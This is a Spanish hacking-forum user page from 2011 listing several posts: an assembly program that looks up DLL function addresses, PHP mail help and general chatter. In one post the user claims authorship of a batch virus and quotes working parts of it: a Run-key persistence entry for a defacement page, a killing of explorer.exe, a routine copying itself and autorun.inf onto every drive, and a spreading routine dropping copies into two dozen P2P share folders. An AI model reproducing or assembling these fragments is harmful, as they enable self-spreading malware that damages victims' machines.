elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ... 50
141  Programación / ASM / Re: [MASM] Busca offsets en: 6 Febrero 2011, 00:30 am
Pensé que después de hacer cmp eax perdería su valor del invoke.

También me comentaron que en vez de:
Código
  1. cmp resultado, NULL
pusiera:
Código
  1. or eax, eax
ya que los registros son más rápidos que las variables, y según Intel or es más rápido que cmp.


Saludos!
142  Programación / ASM / [MASM] Busca offsets en: 5 Febrero 2011, 22:36 pm
Bueno, os dejo mi primera aplicación en ASM (MASM32).

Busca el offset de una función específica en una DLL. Solo hay que modificar "libreria" y "funcion" en .data (tengo que aprender a hacerlo pasando parámetros por línea de comandos).

Código
  1. ;Busca offsets - by pablomi
  2. .386
  3. .model flat, stdcall
  4. option casemap :none
  5.  
  6. include \masm32\include\masm32rt.inc
  7. includelib \masm32\lib\kernel32.lib
  8. includelib \masm32\lib\user32.lib
  9. includelib \masm32\lib\masm32.lib
  10.  
  11. Main PROTO
  12.  
  13. .data
  14.    libreria db "msvcrt.dll",0
  15.    funcion db "printf",0
  16.    error db "No se encontro el proceso.",0
  17.  
  18. .code
  19. codigo:
  20.    invoke Main
  21.    invoke ExitProcess, 0
  22.  
  23. Main PROC
  24.    LOCAL resultado:DWORD
  25.  
  26.    invoke LoadLibrary, addr libreria
  27.    invoke GetProcAddress, eax, addr funcion
  28.    mov resultado, eax
  29.    cmp resultado, NULL
  30.    je Error
  31.    invoke StdOut, uhex$(resultado)
  32.    ret
  33. Error:
  34.    invoke StdOut, addr error
  35.    ret
  36. Main ENDP
  37.  
  38. end codigo

Espero críticas, sugerencias o lo que sea :xD
143  Programación / PHP / Re: ayuda autenticacion smtp en: 4 Febrero 2011, 14:39 pm
bueno, lei sobre phpmailer y es lo que necesito, pero queria hacer una pregunta :

cuales son los datos que debo escribir en los campos username y contraseña que aparecen en el script de phpmailer ?

Gracias por la ayuda
Los datos del SMTP.
144  Foros Generales / Foro Libre / Re: Menor detenido por delitos informaticos contra una empresa. en: 3 Febrero 2011, 23:42 pm
No estoy de acuerdo, tengo 12 y no hago eso. Si ha causado daño y lo han pillado lo pagará y listo. Si no, nada...
Le caerán trabajos sociales :xD

Aunque extorsión es más grave que un "simple deface" :P
145  Programación / PHP / Re: ayuda autenticacion smtp en: 3 Febrero 2011, 23:38 pm
Busca sobre la función mail() o la clase phpmailer.


Saludos!
146  Programación / Scripting / Re: virus autoexec_a.bat en: 3 Febrero 2011, 23:30 pm
Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.

En el código original no era IDEAS.html, era IEAS:
Código
  1. :IEAS
  2. (ECHO.^<HTML^>
  3. ECHO.^<HEAD^>
  4. ECHO.^<title^>HACKED BY [antiguo_nick_mio]^</title^>
  5. ECHO.^</HEAD^>
  6. ECHO.^<BODY^>
  7. ECHO.^<H1^>                  ~~~HACKED BY [antiguo_nick_mio]~~~
  8. ECHO.^</BODY^>
  9. ECHO.^</HTML^>)>%HOMEDRIVE%\IEAS.HTML
  10. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
  11. ATTRIB +H %HOMEDRIVE\IEAS.HTML
  12. GOTO:EOF
  13.  


Esta linea:
Código
  1. tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
copiada tal cual de otro virus mío que llamé "BaTr00t_a".

Código
  1. for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  2. copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
  3. copy /Y "%0" "%%#:\baTr00t_a.bat">nul 2>&1
  4. attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
  5. attrib +R +S +H "%%#:\baTr00t_a.bat">nul 2>&1
  6. )
Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto autoexec_a (conservando el _a).


Y esta parte:
Código
  1. :p2prop
  2. set var=%1
  3. copy /y "%0" "%programfiles%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
  4. copy /y "%0" "%programfiles%\ICQ\shared files\%var%.bat">nul 2>&1
  5. copy /y "%0" "%programfiles%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
  6. copy /y "%0" "%programfiles%\Shareaza\Downloads\%var%.bat">nul 2>&1
  7. copy /y "%0" "%programfiles%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
  8. copy /y "%0" "%programfiles%\eMule\Incoming\%var%.bat">nul 2>&1
  9. copy /y "%0" "%programfiles%\Filetopia3\Files\%var%.bat">nul 2>&1
  10. copy /y "%0" "%programfiles%\XoloX\Downloads\%var%.bat">nul 2>&1
  11. copy /y "%0" "%programfiles%\Gnucleus\Downloads\%var%.bat">nul 2>&1
  12. copy /y "%0" "%programfiles%\LimeWire\Shared\%var%.bat">nul 2>&1
  13. copy /y "%0" "%programfiles%\Grokster\My Grokster\%var%.bat">nul 2>&1
  14. copy /y "%0" "%programfiles%\Overnet\incoming\%var%.bat">nul 2>&1
  15. copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
  16. copy /y "%0" "%programfiles%\Swaptor\Download\%var%.bat">nul 2>&1
  17. copy /y "%0" "%programfiles%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
  18. copy /y "%0" "%programfiles%\Tesla\Files\%var%.bat">nul 2>&1
  19. copy /y "%0" "%programfiles%\BearShare\Shared\%var%.bat">nul 2>&1
  20. copy /y "%0" "%programfiles%\Rapigator\Share\%var%.bat">nul 2>&1
  21. copy /y "%0" "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
  22. copy /y "%0" "%programfiles%\KMD\My Shared Folder\%var%.bat">nul 2>&1
  23. copy /y "%0" "%programfiles%\appleJuice\incoming\%var%.bat">nul 2>&1
  24. copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
  25. goto:eof
  26.  
Ya ni siquiera se molestó en modificarla.


La creación del autorun.inf lo mismo.



En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.


No aporto links para no hacer spam, pero en google podeis encontrarlo.

Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.


Saludos!
147  Programación / Scripting / Re: virus autoexec_a.bat en: 3 Febrero 2011, 22:57 pm
Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:
148  Programación / Programación General / Re: Pedido de documentación de Java, C# y C en: 2 Febrero 2011, 22:35 pm
muchas gracias....aunque me gustaria saber programacion en html ya que no se nada sobre desarrollo de pag web solo tengo conocimientos de c++
¿Y por qué no te pasas por la sección de Desarrollo web? Los foros están organizados para que la gente
pueda encontrar lo que busca en un par de clics, si esto no fuera así no se dividiría por temática.
149  Seguridad Informática / Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : ¿Te apuntas? en: 2 Febrero 2011, 22:18 pm
Yo en principio me apunto, pero a ver los horarios y eso, va ser un poco difícil :xD
150  Programación / Programación C/C++ / Re: necesito ayuda con un programita por favor! en: 1 Febrero 2011, 22:47 pm
domicilio y nombre no pueden ser char xD
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ... 50
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines